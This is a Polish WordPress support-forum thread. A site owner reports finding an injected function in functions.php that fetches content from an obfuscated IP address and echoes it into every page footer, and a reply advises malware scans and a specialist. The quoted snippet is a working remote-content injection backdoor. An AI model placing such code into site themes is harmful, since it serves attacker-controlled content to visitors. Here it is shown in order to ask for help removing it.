• Witajcie,
    Spotkaliście się z takim czymś:

    
    function footer_wp() {
    echo (@file_get_contents("http://" . (150 + 38) . "." . (100 + 16) . "." . (49 + 7) . "." . (83 + 11) . "/wp_footer"));
    }
    add_action( 'wp_footer', 'footer_wp' );
    

    Ten wpis jest w pliku functions.php
    Do tego pojawiają się pliki np: .htaccess.171006124455.orig

    Na serwerze mam ponad 20 stron, nie wiem od kiedy to jest ale spodziewam się że jak padnie wszystko to kopia zapasowa z przed miesiąca nic nie da. Póki co wszystko działa.

    hosting: nazwa.pl
    strony mają SSL

Viewing 1 replies (of 1 total)
  • Witaj, rzeczywiście wygląda niepokojąco. Z mojego doświadczenia nie pozostawiałbym niczego przypadkowi i takie rzeczy traktował jako potencjalny wirus.

    Jeśli chodzi o pliki .htaccess, to dodatkowy plik mógł zostać stworzony przez wtyczkę np. do cachowania.

    Spróbuj przeskanować stronę następującymi wtyczkami:
    https://pl.wordpress.org/plugins/wp-cerber/
    https://pl.wordpress.org/plugins/wordfence/

    Osobiście polecam Cerbera. Niemniej jednak nawet jeśli skanowanie nic nie wskaże, nie oznacza że wirusa nie ma, dlatego rozważ zlecenie tych prac specjaliście.

Viewing 1 replies (of 1 total)
  • Temat ‘Wirusy, dziwne pliki’ jest zamknięty na nowe odpowiedzi.